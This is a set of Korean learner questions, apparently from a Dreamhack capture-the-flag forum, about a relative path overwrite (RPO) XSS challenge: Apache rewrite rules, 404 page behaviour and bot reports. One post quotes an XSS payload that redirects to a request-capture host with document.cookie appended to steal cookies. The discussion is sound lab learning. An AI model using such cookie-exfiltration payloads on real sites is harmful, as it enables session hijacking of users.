페이지를 찾을 수 없는 경우 404.php가 실행되고 그 안에 echo 내용이 해당 파일에 삽입되는 로직인데, 서버에서 제공해준 소스코드를 찾아봐도 404.php의 echo 내용이 404를 반환한 파일에 삽입해주는 로직은 안 보이는데, 이건 서버에서 제공해주지 않는 영역에서 구현해둔 로직인게 맞나요? 왜 filter.js not found라는 글자가 filter.js에 들어가는지 이해가 안 가요

파일을 보면 RewriteEngine on RewriteRule ^/(.*)\.(js|css)$ /static/$1 [L] ErrorDocument 404 /404.php 라는 내용을 확인할 수 있는데, 이렇게 될 경우 정상적인 방법으로 접근해도 filter.js를 불러올 수 없습니다. (filter.js라는 uri를 넣었을 때 .js 앞의 (.*)에 해당하는 filter까지만 $1에 잡히고, /static/filter를 불러오기 때문에 오류 발생. filter.js를 로드하기 위해서는 filter.js.js 라는 uri를 사용해야 함) 이러한 동작이 의도된 것인지 질문드립니다.

패치 분기 filter=='undefined' RPO 취약성을 기반으로 우회 xss 삽입 후 해당 환경에서 외부 요청 확인 -서버 측 report후 요청이 안옴 클라이언트 측면에서 의도한데로 취약성 트리거 완료 후 서버 사이드 측면에서 특정 검사 로직이 없는 것을 확인 하였습니다. 해당 공격에 대한 응답이 오질 않아 혹시 봇이 동작하는지 궁금합니다.

RPO의 개념을 클라이언트와 서버의 상대경로 해석이 달라서 발생하는것으로 이해했습니다. index.php에서 filter.js를 불러오고 있을 때 -> 클라이언트 : /index.php/static/ -> 서버 : index.php -> index.php 안에 있는 filter.js 는 /static/filter.js로 불러와짐 그런데 문제에서는 filter.js 가 불러와지지 않습니다.. 무엇을 잘못한걸까요?

location.href='https://sslpqqi.request.dreamhack.games'로 요청을 보내면 요청이 보내지는데 뒤에 +document.cookie를 추가해서 보내면 요청이 안 보내집니다... 어떻게 해야하나요 도와주세요.

location.href="https://dreamhack.io/" 일때는 %22로 URL인코딩되어 동작을 안하는데 location.href='https://dreamhack.io/' 일때는 동작을 하네요 더블쿼터는 인코딩이 되고, 싱글쿼터는 인코딩이 안되는 이유가 궁금합니다!